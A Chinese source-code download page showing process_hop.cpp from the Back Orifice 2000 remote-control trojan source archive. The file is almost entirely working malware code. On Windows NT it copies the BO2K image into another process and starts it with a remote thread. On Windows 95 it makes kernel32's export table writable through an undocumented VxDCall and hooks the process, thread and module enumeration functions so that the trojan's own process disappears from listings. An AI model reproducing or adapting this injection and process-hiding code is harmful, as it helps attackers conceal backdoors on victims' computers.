开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
process_hop.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:11k
源码类别:

远程控制编程

开发平台:

WINDOWS

process_hop.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<main.h>
  22. #include<bo_debug.h>
  23. #include<functions.h>
  24. #include<osversion.h>
  25. #include<dll_load.h>
  26. #include<pviewer.h>
  27. #include<process_hop.h>
  28. #include<config.h>
  30. // --------------------- Code to hide Win95 processes ----------------------
  32. void __declspec(naked) StartOfHappyCode(void)
  33. {
  34. }
  36. BOOL WINAPI FakeProcess32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
  37. {
  38. if(((PROCESSWALK)0x22222222)(hSnapshot, lppe)==FALSE) return FALSE;
  39. while(lppe->th32ProcessID==0x11111111) {
  40. if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
  41. }
  42. return TRUE;
  43. }
  45. BOOL WINAPI FakeProcess32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
  46. {
  47. if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
  48. while(lppe->th32ProcessID==0x11111111) {
  49. if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
  50. }
  51. return TRUE;
  52. }
  54. BOOL WINAPI FakeThread32First(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
  55. {
  56. if(((THREADWALK)0x44444444)(hSnapshot, lpte)==FALSE) return FALSE;
  57. while(lpte->th32OwnerProcessID==0x11111111) {
  58. if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
  59. }
  60. return TRUE;
  61. }
  63. BOOL WINAPI FakeThread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
  64. {
  65. if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
  66. while(lpte->th32OwnerProcessID==0x11111111) {
  67. if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
  68. }
  69. return TRUE;
  70. }
  72. BOOL WINAPI FakeModule32First(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
  73. {
  74. if(((MODULEWALK)0x66666666)(hSnapshot, lpme)==FALSE) return FALSE;
  75. while(lpme->th32ProcessID==0x11111111) {
  76. if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
  77. }
  78. return TRUE;
  79. }
  81. BOOL WINAPI FakeModule32Next(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
  82. {
  83. if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
  84. while(lpme->th32ProcessID==0x11111111) {
  85. if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
  86. }
  87. return TRUE;
  88. }
  90. void __declspec(naked) EndOfHappyCode(void)
  91. {
  92. }
  96. BOOL SpawnBO2KThread(char *svProcess)
  97. {
  98. if(g_bIsWinNT) {  //---------------------- WINDOWS NT PROCESS HIDE -------------------
  99. // -------------------------------------------------------
  100. // -- Process Hiding Code                               
  101. // -- Note that there are several different ways to do  
  102. // -- what this code does. Both of the methods presented
  103. // -- below were written specifically to avoid accessing
  104. // -- the original BO2K image on disk.
  105. // -- This way, the original BO2K disk file can be compressed
  106. // -- with all of the plugin attachments inside, and
  107. // -- the original executable can be moved around/deleted
  108. // -- while the BO2K server still runs.
  110. // Get another process and thread id
  111. PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL);
  112. DWORD dwThreadID, dwProcID;
  114. for(ppie=ppi;ppie!=NULL;ppie=ppie->next) {
  115. if(lstrcmpi(ppie->svApp,svProcess)==0) break;
  116. }
  117. if(ppie==NULL) return FALSE;
  119. dwProcID=ppie->dwProcID;
  120. dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter)
  122. DestroyProcListSnapshot(ppi);
  124. // Make sure we aren't hopping into ourselves
  125. if(GetCurrentProcessId()==dwProcID) return FALSE;
  127. // Open process to inject code into
  128. HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID);
  129. if(hProc==NULL) {
  130. DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND);
  131. return FALSE;
  132. }
  134. // Free space for BO2K (in case we are restarting)
  135. pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE);
  137. // Allocate space for BO2K to fit in the process
  138. DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage;
  139. char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  140. if(pMem==NULL) {
  141. DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND);
  142. return FALSE;
  143. }
  145. // Lets copy the entire bo2k process into this space.
  146. DWORD dwOldProt,dwNumBytes,i;
  147. MEMORY_BASIC_INFORMATION mbi;
  149. pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
  150. while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
  151. if(!(mbi.Protect & PAGE_GUARD)) {
  152. for(i=0;i<mbi.RegionSize;i+=0x1000) {
  153. pVirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
  154. WriteProcessMemory(hProc,pMem+i,pMem+i,0x1000,&dwNumBytes);
  155. }
  156. }
  158. pMem+=mbi.RegionSize;
  159. pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
  160. }
  162. // Create a remote thread in the other process
  163. DWORD dwRmtThdID;
  164. HANDLE hRmtThd=pCreateRemoteThread(hProc,NULL,0,EntryPoint,(LPVOID)g_module,0,&dwRmtThdID);
  165. if(hRmtThd==NULL) {
  166. DebugMessageBox(NULL,"Could create remote thread","ERROR",MB_SETFOREGROUND);
  167. return FALSE;
  168. }
  170. CloseHandle(hProc);
  171. return 0;
  173. } else { //---------------------------------- WINDOWS 95 PROCESS HIDE -------------
  174. // This one works differently because we don't necessarily have
  175. // the functionality to do a 'CreateRemoteThread()'. And for 
  176. // various reasons, hijacking another thread and changing its
  177. // context to do your bidding doens't really work. It's because
  178. // the thread you hijack may be blocked on a mutex/semaphore/etc
  179. // and won't resume execution to run your code until the blocking
  180. // ID is signaled by the system. So, we have to just hack kernel32.dll
  181. // to forget that our process exists :)
  183. // Start up PE Image Loader
  185. pRegisterServiceProcess(NULL,1);
  187. // Get undocumented VxDCall procedure
  188. HMODULE hModule=GetModuleHandle("kernel32.dll");
  189. FARPROC VxDCall=GetDLLProcAddress(hModule,(LPCSTR)1);
  191. // Check for kernel32.dll export table
  192. PIMAGE_OPTIONAL_HEADER poh=(PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(hModule);
  193. DWORD dwSize=poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
  194. if(dwSize==0) return NULL;
  196. // Good, we have an export table. Lets get it.
  197. PIMAGE_EXPORT_DIRECTORY ped;
  198. ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  200. // Change protection on kernel32.dll export table (make writable)
  201. // (can't use "VirtualProtect")
  202. DWORD dwFirstPage, dwNumPages;
  203. dwFirstPage=((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))/4096;
  204. dwNumPages=((( (((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))-(dwFirstPage*4096)+ped->NumberOfFunctions)) *4)+4095)/4096;
  206. _asm {
  207. push 020060000h                 // PC_WRITEABLE | PC_USER | PC_STATIC
  208. push 0FFFFFFFFh                 // Keep all previous bits
  209. push dword ptr [dwNumPages]     // dword ptr [mbi+0Ch] # of pages
  210. push dword ptr [dwFirstPage]    // dword ptr [ped] page #
  211. push 1000Dh // _PageModifyPermissions (win32_service_table #)
  212. call dword ptr [VxDCall] // VxDCall0
  213. }
  215. // Fix kernel32.dll export table if I happened to fuck things
  216. // up earlier (run bo2k, crash out, and restart)
  218. SpawnCleanup();
  220. InitializeDLLLoad();
  222. // Get shared memory
  223. DWORD dwCodeSize=((DWORD)&EndOfHappyCode) - ((DWORD)&StartOfHappyCode);
  224. LPVOID lpBase;
  225. lpBase=VirtualAlloc((LPVOID)0x9CDC0000,dwCodeSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  226. if(lpBase!=(LPVOID)0x9CDC0000) lpBase=(LPVOID)0x9CDC0000;
  228. // Copy code into shared memory
  229. memcpy(lpBase,(void *)(&StartOfHappyCode),dwCodeSize);
  231. // Store procedure addresses
  232. DWORD dwOldAddress[6],dwCurPid;
  233. dwCurPid=GetCurrentProcessId();
  234. dwOldAddress[0]=(DWORD)GetDLLProcAddress(hModule,"Process32First");
  235. dwOldAddress[1]=(DWORD)GetDLLProcAddress(hModule,"Process32Next");
  236. dwOldAddress[2]=(DWORD)GetDLLProcAddress(hModule,"Thread32First");
  237. dwOldAddress[3]=(DWORD)GetDLLProcAddress(hModule,"Thread32Next");
  238. dwOldAddress[4]=(DWORD)GetDLLProcAddress(hModule,"Module32First");
  239. dwOldAddress[5]=(DWORD)GetDLLProcAddress(hModule,"Module32Next");
  241. // Modify code to correct addresses
  242. DWORD i;
  243. for(i=0;i<(dwCodeSize-4);i++) {
  244. DWORD *dwPtr=(DWORD *)((BYTE *)lpBase+i);
  245. if     (*dwPtr==0x11111111) *dwPtr=dwCurPid;
  246. else if(*dwPtr==0x22222222) *dwPtr=(DWORD)dwOldAddress[0];
  247. else if(*dwPtr==0x33333333) *dwPtr=(DWORD)dwOldAddress[1];
  248. else if(*dwPtr==0x44444444) *dwPtr=(DWORD)dwOldAddress[2];
  249. else if(*dwPtr==0x55555555) *dwPtr=(DWORD)dwOldAddress[3];
  250. else if(*dwPtr==0x66666666) *dwPtr=(DWORD)dwOldAddress[4];
  251. else if(*dwPtr==0x77777777) *dwPtr=(DWORD)dwOldAddress[5];
  252. }
  254. // Now we modify the export table to point to our replacement code
  256. SetDLLProcAddress(hModule,"Process32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32First)));
  257. SetDLLProcAddress(hModule,"Process32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32Next)));
  258. SetDLLProcAddress(hModule,"Thread32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32First)));
  259. SetDLLProcAddress(hModule,"Thread32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32Next)));
  260. SetDLLProcAddress(hModule,"Module32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32First)));
  261. SetDLLProcAddress(hModule,"Module32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32Next)));
  263. // Done with dll_load
  264. KillDLLLoad();
  266. EntryPoint(GetModuleHandle(NULL));
  268. SpawnCleanup();
  270. }
  272. return TRUE;
  273. }
  275. void SpawnCleanup(void)
  276. {
  277. if(!g_bIsWinNT) {
  278. InitializeDLLLoad();
  279. HMODULE hModule=GetModuleHandle("kernel32.dll");
  281. ResetDLLProcAddress(hModule,"Process32First");
  282. ResetDLLProcAddress(hModule,"Process32Next");
  283. ResetDLLProcAddress(hModule,"Thread32First");
  284. ResetDLLProcAddress(hModule,"Thread32Next");
  285. ResetDLLProcAddress(hModule,"Module32First");
  286. ResetDLLProcAddress(hModule,"Module32Next");
  287. KillDLLLoad();
  288. }
  289. }